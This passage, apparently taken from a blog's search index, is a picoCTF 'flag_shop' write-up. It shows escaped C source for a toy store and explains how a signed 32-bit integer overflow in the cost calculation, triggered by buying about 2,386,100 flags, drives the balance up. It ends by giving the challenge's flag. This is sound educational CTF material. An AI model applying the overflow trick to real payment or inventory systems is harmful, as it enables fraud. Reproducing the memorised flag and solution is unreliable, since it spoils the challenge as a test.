Flag\\n\u0026#34;); 27 printf(\u0026#34;2. 1337 Flag\\n\u0026#34;); 28 int auction_choice; 29 fflush(stdin); 30 scanf(\u0026#34;%d\u0026#34;, \u0026amp;auction_choice); 31 if(auction_choice == 1){ 32 printf(\u0026#34;These knockoff Flags cost 900 each, enter desired quantity\\n\u0026#34;); 33 34 int number_flags = 0; 35 fflush(stdin); 36 scanf(\u0026#34;%d\u0026#34;, \u0026amp;number_flags); 37 if(number_flags \u0026gt; 0){ 38 int total_cost = 0; 39 total_cost = 900*number_flags; 40 printf(\u0026#34;\\nThe final cost is: %d\\n\u0026#34;, total_cost); 41 if(total_cost \u0026lt;= account_balance){ 42 account_balance = account_balance - total_cost; 43 printf(\u0026#34;\\nYour current balance after transaction: %d\\n\\n\u0026#34;, account_balance); 44 } 45 else{ 46 printf(\u0026#34;Not enough funds to complete purchase\\n\u0026#34;); 47 } 48 49 50 } 51 52 } 53 else if(auction_choice == 2){ 54 printf(\u0026#34;1337 flags cost 100000 dollars, and we only have 1 in stock\\n\u0026#34;); 55 printf(\u0026#34;Enter 1 to buy one\u0026#34;); 56 int bid = 0; 57 fflush(stdin); 58 scanf(\u0026#34;%d\u0026#34;, \u0026amp;bid); 59 60 if(bid == 1){ 61 62 if(account_balance \u0026gt; 100000){ 63 FILE *f = fopen(\u0026#34;flag.txt\u0026#34;, \u0026#34;r\u0026#34;); 64 if(f == NULL){ 65 66 printf(\u0026#34;flag not found: please run this on the server\\n\u0026#34;); 67 exit(0); 68 } 69 char buf[64]; 70 fgets(buf, 63, f); 71 printf(\u0026#34;YOUR FLAG IS: %s\\n\u0026#34;, buf); 72 } 73 74 else{ 75 printf(\u0026#34;\\nNot enough funds for transaction\\n\\n\\n\u0026#34;); 76 }} 77 78 } 79 } 80 else{ 81 con = 1; 82 } 83 84 } 85 return 0; 86} Our goal here is to end up with an account balance greater than $100,000 to buy the real flag.\nWhile analyzing the source, I identified a section on line 39 where the program calculates the total cost of flags to be purchased. Recognizing that number_flags is an integer input multiplied by 900 to calculate total_cost, we may be able to exploit an integer overflow that occurs in this calculation.\nIf the total_cost value can be manipulated to a negative value, it could trick the program\u0026rsquo;s logic by subtracting a negative amount from our account balance, thereby boosting our funds (adding total_cost to our account balance).\nBy definition, an integer overflow occurs when an integer value is incremented to a value that is too large to store in the associated representation. When this occurs, the value may wrap to become a very small or negative number. While this may be intended behavior in circumstances that rely on wrapping, it can have security consequences if the wrap is unexpected. This is especially the case if the integer overflow can be triggered using user-supplied inputs [CWE-190].\nnumber_flags and total_cost are both declared as an int variable written in C. In this case, int is signed and contains 32 bits.\nNote: Binaries might be 32 or 64 bit which could affect integer sizes. While users could make an assumption about an integers size, it is a good idea to verify. In C, you could always check with sizeof(int) which should return the size in bytes. In the case of a 32-bit integer, this function call should return 4 bytes.\nOur hint from picoCTF tells us that “Two’s complement can do some weird things when numbers get really big!”. In short, two’s complement is a mathematical method that is used to represent negative numbers with positive binary numbers.\nTake a look at this chart that uses a 4-bit representation in two’s complement format to represent the signed integers:\nThe positive integer 1 in binary is 0001. To represent -1 using two\u0026rsquo;s complement, you would invert the bits to get 1110 and then add 1 to get 1111.\nAs mentioned previously, the integer overflow will occur when an integer value is incremented to a value that is too large to store in the associated representation. In this instance, the signed 4-bit integer can represent values from -8 to 7 and when you try to add 1 to the 7, the result will be -8 as the value has “wrapped around” due to the overflow — this is because we do not have enough bits to represent an 8. An 8 in binary is 00001000, this is too long for our 4-bit binary representation, so everything but the last four bits will be truncated, leaving 1000. A quick look at our chart tells us that it is -8.\nThe range of values for a signed 32-bit integer are from -(2^31) to 2^31 - 1 or -2,147,483,648 to 2,147,483,647.\nRemember, once we get to the upper limit of what we can represent in two\u0026rsquo;s complement, then the very next number in binary counting is a negative. Therefore, to calculate the value of number_flags that would trigger the integer overflow, we can take the upper limit of 2,147,483,647 and divide by 900, price per flag. The result is 2386092.94111, and we can round this number to 2386100 to ensure that the overflow occurs reliably.\nThis will exceed the maximum representable value for the integer and hopefully then make our account balance go up so we can purchase the flag.\nFlag: picoCTF{m0n3y_bag5_68d16363}\n","permalink":"https://nhantouli.com/posts/flag-shop-writeup/","summary":"\u003cp\u003e\u003cem\u003eThis is a write-up for the \u003ca href=\"https://picoctf.org/\"\u003epicoCTF\u003c/a\u003e challenge “flag_shop”. PicoCTF is a CTF (Capture the Flag) platform created by Carnegie Mellon University to solve challenges in six different cyber security domains including web exploitation, reverse engineering, binary exploitation, and more. Writeups for this challenge were fragmented and lacked detail, so I took a crack at it to help bring some clarity!\u003c/em\u003e\u003c/p\u003e\n\u003ch2 id=\"description\"\u003eDescription:\u003c/h2\u003e\n\u003cp\u003e\u003cimg alt=\"Description Image\" loading=\"lazy\" src=\"/images/flag-shop-writeup/flag-shop-desc.png\"\u003e\u003c/p\u003e\n\u003ch2 id=\"solution\"\u003eSolution:\u003c/h2\u003e\n\u003cp\u003eIn this challenge we deal with a simple flag store and are provided its \u003ca href=\"https://jupiter.challenges.picoctf.org/static/dd28f0987f28c894f35d5d48564c3402/store.c\"\u003esource\u003c/a\u003e written in C.\u003c/p\u003e","title":"picoCTF flag_shop writeup"}]